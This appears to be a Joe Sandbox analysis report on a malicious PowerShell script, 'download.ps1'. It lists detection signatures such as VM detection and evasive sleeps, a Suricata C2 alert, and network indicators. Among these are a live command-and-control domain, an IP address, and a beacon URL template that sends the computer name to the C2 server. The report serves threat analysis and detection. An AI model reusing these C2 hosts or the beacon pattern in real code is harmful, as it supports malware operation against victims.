Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1579001
MD5:506d528176abebda1202676b0528e974
SHA1:58036f821fad918c508ed11270e2df7474b3a2e3
SHA256:bd7cd2b13af4f8065d7970d6a6c0163ce4e155c60ae7a67062e4e17c439b1f95
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 644, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 644, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-20T17:34:58.369189+010028593911Domain Observed Used for C2 Detected192.168.2.7524521.1.1.153UDP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.2% probability
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1428627321.00000235E907E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1431782162.00000235E938D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbGC source: powershell.exe, 00000000.00000002.1430212250.00000235E9284000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1431782162.00000235E9425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.1430212250.00000235E9284000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbllu8w source: powershell.exe, 00000000.00000002.1431782162.00000235E938D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1431782162.00000235E9425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1428627321.00000235E907E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbv source: powershell.exe, 00000000.00000002.1431782162.00000235E9425000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2859391 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.7:52452 -> 1.1.1.1:53
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235814F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?id=$env:computername&key=$ukcqoy&s=527
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1393644816.0000023581769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235814F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.1393644816.00000235814F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
Source: powershell.exe, 00000000.00000002.1430090401.00000235E9190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1393644816.0000023580001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1393644816.0000023581769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.0000023581773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.0000023581787000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.e
Source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.i
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1393644816.0000023580001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1417520976.0000023590001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.0000023590269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235902F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.0000023581999000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1417520976.0000023590269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.0000023581773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1393644816.0000023581999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1417520976.0000023590001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.0000023590269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235902F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1393644816.0000023581787000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.png
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.pngX
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/year
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/year-in-search-2024-global-6753651837110649-2xa.gif
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/year-in-search-2024-global-6753651837110649-2xa.gifX
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://blog.google/products/gemin
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://blog.google/products/gemini/google-gemini-ai-holiday-planning-2
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1393644816.0000023581999000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1393644816.0000023581999000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC487E560_2_00007FFAAC487E56
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC488C020_2_00007FFAAC488C02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC480B6A0_2_00007FFAAC480B6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC6C6D1A0_2_00007FFAAC6C6D1A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC6C7CFD0_2_00007FFAAC6C7CFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC6C35890_2_00007FFAAC6C3589
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.1393644816.0000023581999000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4wX
Source: powershell.exe, 00000000.00000002.1417520976.0000023590001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.0000023590269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235902F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ2Wqxe4sfCzpkRcf-DEQHyAKQh5J2xrC" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="q0Qh02Fx1ZnHOkNjcAOMoA">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwiXo8fT47aKAxVa3jQHHcR7GSoQnIcBCAU"><img alt="" height="32" src="https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.png" width="32"><a href="https://www.google.com/url?q=https://blog.google/products/gemini/google-gemini-ai-holiday-planning-2024/%3Futm_source%3Dhpp%26utm_medium%3Dreferral&amp;source=hpp&amp;id=19046184&amp;ct=3&amp;usg=AOvVaw0wTMtITXLpc8KeH3Y4fICW&amp;sa=X&amp;ved=0ahUKEwiXo8fT47aKAxVa3jQHHcR7GSoQ8IcBCAY" rel="nofollow">5 ways Gemini can help during the Holidays</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="q0Qh02Fx1ZnHOkNjcAOMoA">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="q0Qh02Fx1ZnHOkNjcAOMoA">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuac
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w'
